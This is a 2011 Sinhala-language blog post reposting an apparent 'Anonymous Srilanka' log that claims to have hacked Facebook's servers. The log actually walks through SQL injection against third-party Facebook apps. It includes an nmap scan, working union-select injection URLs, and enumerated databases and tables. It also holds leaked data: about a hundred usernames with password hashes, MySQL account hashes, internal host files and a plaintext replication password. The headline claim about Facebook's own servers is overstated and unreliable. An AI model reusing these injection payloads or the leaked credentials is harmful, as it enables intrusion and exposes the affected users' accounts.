Ads 468x60px

Sport News

Visitors

පහත ඇති "Like" Button එක ක්ලික් කර ඔබත් අදම අපේ Facebook Fan කෙනෙකු වන්න

Powered By Tricks Lanka

Comments

Tuesday, October 18, 2011

Operation Facebook හි පළමු පියවර

  1. මං කලින් සදහන් කල නොවැම්බර් 5 , 2011 ෆෙස්බුකිය අවසාන වෙයි ද?? යන ලිපි යෙ Operation Facebook හි පළමු පියවර වශයෙන් FaceBook's servers  හැක් කලාය එයින් ලබා ගත් දත්තයන් පහත දක්වා ඇත.

  3. =================================================================
  4. FaceBook's servers was hacked by Anonymous Srilanka team. Hack of the year!
  5. =================================================================

  1. [0x00] [Introduction]
  2. [0x01] [First impressions]
  3. [0x02] [Search for bugs]
  4. [0x03] [Crash Exploit]
  5. [0x04] [Conclusion]
  6. [0x05] [Greetz]


    1.           [Introduction]
    6. + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
    7. parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
    9. We did not change the main page, do not sell backup server does not delete files.
    11. We have demonstrated the flaw in the system. Start =] ..
    15.    __             __      _    
    16.  /'__`\         /'__`\  /' \    
    17. /\ \/\ \  __  _/\ \/\ \/\_, \  
    18. \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \  
    19.  \ \ \_\ \/>  </\ \ \_\ \ \ \ \
    20.   \ \____//\_/\_\\ \____/  \ \_\
    21.    \/___/ \//\/_/ \/___/    \/_/
    22.         [First impressions]
    27. At first glance, FaceBook well protected social network.
    28. Scanning FaceBook server did not give nothing interesting ... )
    30. ..>
    32. Initiating Parallel DNS resolution of 1 host.
    33. Completed Parallel DNS resolution of 1 host.
    34. Initiating SYN Stealth Scan
    35. Scanning facebook.com (69.63.181.11) [1000 ports]
    36. Discovered open port 443/tcp on 69.63.181.11
    37. Discovered open port 80/tcp on 69.63.181.11
    38. Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
    39. Initiating Service scan
    40. Scanning 2 services on facebook.com (69.63.181.11)
    41. Service scan Timing: About 50.00% done; ETC:
    42. Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
    43. NSE: Script scanning 69.63.181.11.
    44. NSE: Starting runlevel 1 (of 1) scan.
    45. Initiating NSE at 22:41
    46. Completed NSE at 22:41, 0.38s elapsed
    47. NSE: Script Scanning completed.
    48. Nmap scan report for facebook.com (69.63.181.11)
    49. Host is up (0.17s latency).
    50. Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
    51. rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
    52. Not shown: 998 filtered ports
    53. PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https
    56. go ahead .. =]

      1. [Search for bugs]
      5. We use GoOgle.com
      7. request: Facebook+Vulnerability [search]
      9. We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities

      12. All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com
      14. request: site:facebook.com WARNING error
      16. =\ fuck...
      17.     Let us not lose heart) Hackers are not looking for easy ways
      20. Visit Facebook.com
      22. Let us search bugs in Web Apps.
      24. http://www.facebook.com/robots.txt

        1. oooooooooooooooooooooooooooo
        2. User-agent: *
        3. Disallow: /ac.php
        4. Disallow: /ae.php
        5. Disallow: /album.php
        6. Disallow: /ap.php
        7. Disallow: /feeds/
        8. Disallow: /p.php
        9. Disallow: /photo_comments.php
        10. Disallow: /photo_search.php
        11. Disallow: /photos.php
        12.  
        13. User-agent: Slurp
        14. Disallow: /ac.php
        15. Disallow: /ae.php
        16. Disallow: /album.php
        17. Disallow: /ap.php
        18. Disallow: /feeds/
        19. Disallow: /p.php
        20. Disallow: /photo.php
        21. Disallow: /photo_comments.php
        22. Disallow: /photo_search.php
        23. Disallow: /photos.php
        24.  
        25. User-agent: msnbot
        26. Disallow: /ac.php
        27. Disallow: /ae.php
        28. Disallow: /album.php
        29. Disallow: /ap.php
        30. Disallow: /feeds/
        31. Disallow: /p.php
        32. Disallow: /photo.php
        33. Disallow: /photo_comments.php
        34. Disallow: /photo_search.php
        35. Disallow: /photos.php
        36.  
        37. # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
        38. Sitemap: http://www.facebook.com/sitemap.php
        39. 00000000000000000000000000000000
        40.  
        41. nothing interesting =\
        42.  
        43. http://apps.facebook.com/tvshowchat/
        44.  
        45. I looked closely, I noticed links
        46.  
        47. http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
        48.  
        49. check:
        50.  
        51. http://apps.facebook.com/tvshowchat/show.php?id=123
        52.  
        53.  
        54. ooooooooooooooooooooooooooo
        55.  
        56. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
        57.  
        58. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        59.  
        60. Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        61.  
        62. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        63.  
        64. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
        65.  
        66. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
        67.  
        68. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
        69.  
        70. and other....
        71.  
        72. oooooooooooooooooooooooooooo
        73.  
        74.  
        75. O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
        76.  
        77. Writing exploits, I got the following:
        78.   http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
        79.  
        80.  
        81. ooooooooooooooooooooooooooo
        82.  
        83. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        84.  
        85. Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        86.  
        87. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        88.  
        89. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        90.  
        91. Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        92.  
        93. 5.0.45-log <= ALERT!!!
        94.  
        95. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
        96.  
        97. and other....
        98.  
        99. oooooooooooooooooooooooooooo
        100.  
        101.  
        102. Database : adminclt_testsite
        103. Database User : adminclt_13@209.68.2.10
        104. MySQL Version : 5.0.67-log
        105.  
        106.  
        107. super = ] Now, we just can say that there is SQL Injection Vulnerability
        108.  
        109. http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
        110.  
        111. Now we know that there is MySql 5.0.45-log
        112.  
        113. Then let's write another exploit to display tables with information_schema.tables:
        114.  
        115. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
        116.  
        117.  
        118. oooooooooooooooooooooooooooo
        119.  
        120. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        121.  
        122. Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
        123.  
        124. Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
        125.  
        126. 201 <= ALERT!!! 201 tables!
        127.  
        128. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
        129.  
        130. and other....
        131.  
        132. oooooooooooooooooooooooooooo
        133.  
        134. http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL 123]
        135.  
        136. Database : adminclt_testsite
        137. Database User : adminclt_13@209.68.2.10
        138. MySQL Version : 5.0.67-log
        139.  
        140.  
        141. 1) AdCode
        142. 2) AdTrack
        143. 3) Admin_DataStore
        144. 4) Admin_User
        145. 5) Challenges
        146. 6) ChallengesCompleted
        147. 7) Comments
        148. 8) ContactEmails
        149. 9) Content
        150. 10) ContentImages
        151. 11) FeaturedTemplate
        152. 12) FeaturedWidgets
        153. 13) Feeds
        154. 14) FolderLinks
        155. 15) Folders
        156. 16) ForumTopics
        157. 17) Log
        158. 18) LogDumps
        159. 19) Newswire
        160. 20) NotificationMessages
        161. 21) Notifications
        162. 22) Orders
        163. 23) OutboundMessages
        164. 24) Photos
        165. 25) Prizes
        166. 26) RawExtLinks
        167. 27) RawSessions
        168. 28) SessionLengths
        169. 29) Sites
        170. 30) Subscriptions
        171. 31) SurveyMonkeys
        172. 32) SystemStatus
        173. 33) Templates
        174. 34) User
        175. 35) UserBlogs
        176. 36) UserCollectives
        177. 37) UserInfo
        178. 38) UserInvites
        179. 39) Videos
        180. 40) WeeklyScores
        181. 41) Widgets
        182. 42) cronJobs
        183. 43) fbSessions
        184.  
        185. Admin_User
        186.  
        187. 1) id
        188. 2) name
        189. 3) email
        190. 4) password
        191. 5) userid
        192. 6) ncUid
        193. 7) level
        194.  
        195. User
        196.  
        197. 1) userid
        198. 2) ncUid
        199. 3) name
        200. 4) email
        201. 5) isAdmin
        202. 6) isBlocked
        203. 7) votePower
        204. 8) remoteStatus
        205. 9) isMember
        206. 10) isModerator
        207. 11) isSponsor
        208. 12) isEmailVerified
        209. 13) isResearcher
        210. 14) acceptRules
        211. 15) optInStudy
        212. 16) optInEmail
        213. 17) optInProfile
        214. 18) optInFeed
        215. 19) optInSMS
        216. 20) dateRegistered
        217. 21) eligibility
        218. 22) cachedPointTotal
        219. 23) cachedPointsEarned
        220. 24) cachedPointsEarnedThisWeek
        221. 25) cachedPointsEarnedLastWeek
        222. 26) cachedStoriesPosted
        223. 27) cachedCommentsPosted
        224. 28) userLevel
        225.  
        226. http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL shevantha]
        227.  
        228. Current Database : signalpa_fbmFundRraise
        229. Database User : signalpa_rockaja@localhost
        230. MySQL Version : 5.0.85-community
        231.  
        232. DATABASE
        233. 1) information_schema
        234. 2) signalpa_CelebrityPuzzle
        235. 3) signalpa_EBF
        236. 4) signalpa_appNotification
        237. 5) signalpa_appnetwork
        238. 6) signalpa_dailyscriptures
        239. 7) signalpa_ebayfeed
        240. 8) signalpa_fbmFundRraise
        241. 9) signalpa_fbmFundRraisebeta
        242. 10) signalpa_netcards
        243. 11) signalpa_paypal
        244. 12) signalpa_thepuzzle
        245.  
        246. signalpa_fbmFundRraise
        247. 1) Campaigns
        248. 2) Campaigns_Temp
        249. 3) FB_theme
        250. 4) IfundDollars
        251. 5) Languages
        252. 6) Payments
        253. 7) Paymentsoops
        254. 8) Supporters
        255. 9) Users
        256. 10) Withdrawals
        257. 11) invites
        258. 12) invites_copy
        259. 13) mp_passwords
        260. 14) payment_codes
        261. 15) txt_codes
        262. 16) valid_servers
        263. 17) weeklyBonus
        264.  
        265.     Column: Users
        266.  
        267.  
        268. 1) id
        269. 2) name
        270. 3) email
        271. 4) mobile_no
        272. 5) address
        273. 6) country
        274. 7) password
        275. 8) organisation
        276. 9) date_created
        277. 10) date_updated
        278. 11) status
        279. 12) facebook_id
        280. 13) isFacebookFan
        281. 14) verify
        282. 15) paypalUse
        283. 16) paypalEmail
        284. 17) bacUse
        285. 18) bacAcc
        286. 19) bacName
        287. 20) bacLocation
        288. 21) bacCountry
        289. 22) bacIBAN
        290. 23) bacSort_code
        291. 24) current_rank
        292. 25) new_rank
        293. 26) cronjob
        294. 27) max_fundraise
        295.  
        296.     Column: mp_passwords
        297.  
        298. 1) id
        299. 2) password
        300. 3) username
        301. 4) status
        302. 5) number
        303. 6) rc
        304. 7) referer
        305. 8) transID
        306. 9) currency
        307. 10) transType
        308. 11) amount
        309. 12) confirmed
        310. 13) date
        311.  
        312. signalpa_paypal
        313. 1) paypal_cart_info
        314. 2) paypal_payment_info
        315. 3) paypal_subscription_info
        316. [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
        317. [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
        318. [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
        319.  
        320. Column: paypal_cart_info
        321. 1) txnid
        322. 2) itemname
        323. 3) itemnumber
        324. 4) os0
        325. 5) on0
        326. 6) os1
        327. 7) on1
        328. 8) quantity
        329. 9) invoice
        330. 10) custom
        331.  
        332.     Column : paypal_payment_info
        333.  
        334. 1) firstname
        335. 2) lastname
        336. 3) buyer_email
        337. 4) street
        338. 5) city
        339. 6) state
        340. 7) zipcode
        341. 8) memo
        342. 9) itemname
        343. 10) itemnumber
        344. 11) os0
        345. 12) on0
        346. 13) os1
        347. 14) on1
        348. 15) quantity
        349. 16) paymentdate
        350. 17) paymenttype
        351. 18) txnid
        352. 19) mc_gross
        353. 20) mc_fee
        354. 21) paymentstatus
        355. 22) pendingreason
        356. 23) txntype
        357. 24) tax
        358. 25) mc_currency
        359. 26) reasoncode
        360. 27) custom
        361. 28) country
        362. 29) datecreation
        363.  
        364.  
        365. http://apps.facebook.com/tvshowchat/show.php?id=[SQL shevantha]
        366.  
        367.  
        368. Current Database : tv
        369. Database User : tomkincaid@ps5008.dreamhost.com
        370. MySQL Version : 5.0.45-log
        371.  
        372.     DATABASES
        373.  
        374.  
        375. 1) information_schema
        376. 2) astro
        377. 3) candukincaid
        378. 4) cemeteries
        379. 5) churchwpdb
        380. 6) countdownapp
        381. 7) crush
        382. 8) dare
        383. 9) friendiq
        384. 10) giants
        385. 11) hookup
        386. 12) jauntlet
        387. 13) loccus
        388. 14) luciacanduwp
        389. 15) maps
        390. 16) martisor
        391. 17) mediax
        392. 18) mostlikely
        393. 19) music
        394. 20) pimpfriends
        395. 21) plans
        396. 22) politicsapp
        397. 23) postergifts
        398. 24) posters2
        399. 25) projectbasecamp
        400. 26) pwnfriends
        401. 27) quiz
        402. 28) seeall
        403. 29) send
        404. 30) supporter
        405. 31) swapu
        406. 32) tomsapps
        407. 33) travelbug
        408.  
        409.     tab.send
        410.  
        411.  
        412. 1) app
        413. 2) item
        414. 3) itemforuser
        415. 4) neverblue
        416. 5) user
        417.  
        418.     Columns
        419.  
        420. user(12454)
        421.  
        422. 1) userid
        423. 2) siteid
        424. 3) appkey
        425. 4) session
        426. 5) points
        427. 6) added
        428. 7) removed
        429.  
        430. Tab. candukincaid
        431.  
        432. 1) wp_comments
        433. 2) wp_links
        434. 3) wp_options
        435. 4) wp_post****
        436. 5) wp_posts
        437. 6) wp_px_albumPhotos
        438. 7) wp_px_albums
        439. 8) wp_px_galleries
        440. 9) wp_px_photos
        441. 10) wp_px_plugins
        442. 11) wp_term_relationships
        443. 12) wp_term_taxonomy
        444. 13) wp_terms
        445. 14) wp_user****
        446. 15) wp_users
        447.  
        448.  
        449.     Column wp_users
        450.  
        451.  
        452. 1) ID
        453. 2) user_login
        454. 3) user_pass
        455. 4) user_nicename
        456. 5) user_email
        457. 6) user_url
        458. 7) user_registered
        459. 8) user_activation_key
        460. 9) user_status
        461. 10) display_name
        462.  
        463. etc...
        464.  
        465. http://apps.facebook.com/fluff/fluffbook.php?id=[SQL shevantha]
        466.  
        467. > ~ facebook_exploit [ENTER]
        468.  
        469. root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
        470. slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
        471. muu:*74A45B921A1A918B18AE9B137396E5A67E006262
        472. monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
        473. maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
        474.  
        475. http://apps.facebook.com/snowago/area.php?areaid=[SQL Shevantha]
        476.  
        477. Database: affinispac_fb
        478. User: affinispac_fb@localhost
        479. Version: 5.0.67-community
        480.  
        481. http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Shevantha]
        482.  
        483. >plucky@localhost : facebook : 4.0.13-log
        484.  
        485. etc... =]
        486.  
        487.  
        488. Next xD
        489.  
        490. Database: thetvdb
        491.  User: thetvdb@localhost
        492.  Version: 5.0.51a-24-log
        493.  
        494.  
        495. [Database]: thetvdb
        496.  
        497.  
        498. [1]aka_seriesname
        499. [2]apiusers
        500. [3]banners
        501. [4]deletions
        502. [5]genres
        503. [6]imgstatus
        504. [7]languages
        505. [8]mirrors
        506. [9]networks
        507. [10]ratings
        508. [11]runtimes
        509. [12]seriesactors
        510. [13]seriesupdates
        511. [14]translation_episodename
        512. [15]translation_episodeoverview
        513. [16]translation_labels
        514. [17]translation_seriesname
        515. [18]translation_seriesoverview
        516. [19]tvepisodes
        517. [20]tvseasons
        518. [21]tvseries
        519. [22]user_episodes
        520. [23]users
        521.  
        522. users:
        523.  
        524.    id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
        525.    favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
        526.    lastupdatedby_admin,mirrorupdate
        527.  
        528.  
        529. [userpass]
        530.  
        531. [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
        532. [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
        533. [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
        534. [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
        535. [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
        536. [6] 3d801aa532c1cec3ee82d87a99fdf63f
        537.  
        538. [Database]: wiki
        539.  
        540.  
        541. [24]archive
        542. [25]categorylinks
        543. [26]externallinks
        544. [27]filearchive
        545. [28]hitcounter
        546. [29]image
        547. [30]imagelinks
        548. [31]interwiki
        549. [32]ipblocks
        550. [33]job
        551. [34]langlinks
        552. [35]logging
        553. [36]math
        554. [37]objectcache
        555. [38]oldimage
        556. [39]page
        557. [40]page_restrictions
        558. [41]pagelinks
        559. [42]querycache
        560. [43]querycache_info
        561. [44]querycachetwo
        562. [45]recentchanges
        563. [46]redirect
        564. [47]revision
        565. [48]searchindex
        566. [49]site_stats
        567. [50]templatelinks
        568. [51]text
        569. [52]trackbacks
        570. [53]transcache
        571. [54]user
        572. [55]user_groups
        573. [56]user_newtalk
        574. [57]watchlist
        575.  
        576. user:
        577.  
        578.   user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
        579.   user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
        580.   user_email_token_expires,user_registration,user_editcount
        581.  
        582. ['user_name'] : ['user_pass']
        583.  
        584.  
        585. [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
        586. [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
        587. [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
        588. [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
        589. [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
        590. [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
        591. [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
        592. [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
        593. [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
        594. [10] Bsudbury: [10] 827d07956629c37855f3518374821872:
        595. [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
        596. [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
        597. [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
        598. [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
        599. [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
        600. [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
        601. [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
        602. [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
        603. [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
        604. [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
        605. [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
        606. [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
        607. [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
        608. [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
        609. [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
        610. [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
        611. [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
        612. [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
        613. [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
        614. [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
        615. [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
        616. [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
        617. [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
        618. [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
        619. [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
        620. [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
        621. [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
        622. [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
        623. [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
        624. [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
        625. [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
        626. [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
        627. [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
        628. [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
        629. [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
        630. [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
        631. [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
        632. [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
        633. [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
        634. [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
        635. [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
        636. [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
        637. [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
        638. [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
        639. [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
        640. [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
        641. [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
        642. [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
        643. [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
        644. [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
        645. [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
        646. [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
        647. [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
        648. [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
        649. [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
        650. [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
        651. [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
        652. [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
        653. [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
        654. [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
        655. [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
        656. [72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
        657. [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
        658. [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
        659. [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
        660. [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
        661. [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
        662. [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
        663. [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
        664. [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
        665. [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
        666. [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
        667. [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
        668. [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
        669. [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
        670. [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
        671. [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
        672. [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
        673. [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
        674. [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
        675. [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
        676. [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
        677. [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
        678. [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
        679. [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
        680. [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
        681.  
        682. ---------------------------------------------------------------------------------------------------------------------------------------------------
        683.  
        684. read /etc/hosts
        685.  
        686. 127.0.0.1 localhost localhost.localdomain
        687. 192.168.1.167 140696-db2.flufffriends.com 140696-db2
        688. 192.168.1.166 140695-db1.flufffriends.com 140695-db1
        689. 192.168.1.165 140694-web2.flufffriends.com 140694-web2
        690. 192.168.1.164 140693-web1.flufffriends.com 140693-web1
        691. 69.63.176.141 api.facebook.com
        692. 208.116.17.80 peanutlabs.com
        693.  
        694. ----------------------------------
        695.  
        696. /etc/my.cnf
        697.  
        698. #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
        699.  
        700. log-bin=/var/lib/mysqllogs/bin-log
        701.  
        702. binlog-do-db=fluff2
        703.  
        704. expire-logs-days=14
        705.  
        706.  
        707.  
        708. server-id = 5
        709.  
        710.  
        711.  
        712. #master-host=69.63.176.141
        713.  
        714. #master-user=romis_user
        715.  
        716. #master-password=romis0123
        717.  
        718. #master-connect-retry=60
        719.  
        720. replicate-do-db=miserman
        721.  
        722.  
        723. #log-slave-updates
        724.  
        725. expire_logs_days = 14
        726.  
        727.  
        728. I think we found a sufficient number of vulnerabilities!
        729.  
        730. ---------------------------
        731.  
        732.    __             __      __    
        733.  /'__`\         /'__`\  /'__`\  
        734. /\ \/\ \  __  _/\ \/\ \/\_\L\ \  
        735. \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
        736.  \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
        737.   \ \____//\_/\_\\ \____/\ \____/
        738.    \/___/ \//\/_/ \/___/  \/___/
        739.       [Crash Exploit]
        740.  
        741.  
        742.  
        743. So .. Moving on to the fun friends
        744.  
        745. To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]
        746.  
        747. ..> Exploit start . + . + . + . + . + . + .
        748.  
        749. wp_posts
        750.  
        751. post_password
        752.  
        753. wp_users
        754.  
        755. user_pass
        756.  
        757. done.....
        758.  
        759.  
        760. WordPress! oO one of the modules installed in facebook is Wordpress!
        761.  
        762.  
        763. check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
        764.  
        765.  
        766. oooooooooooooooooooooooooooo
        767.  
        768. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        769.  
        770. Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        771.  
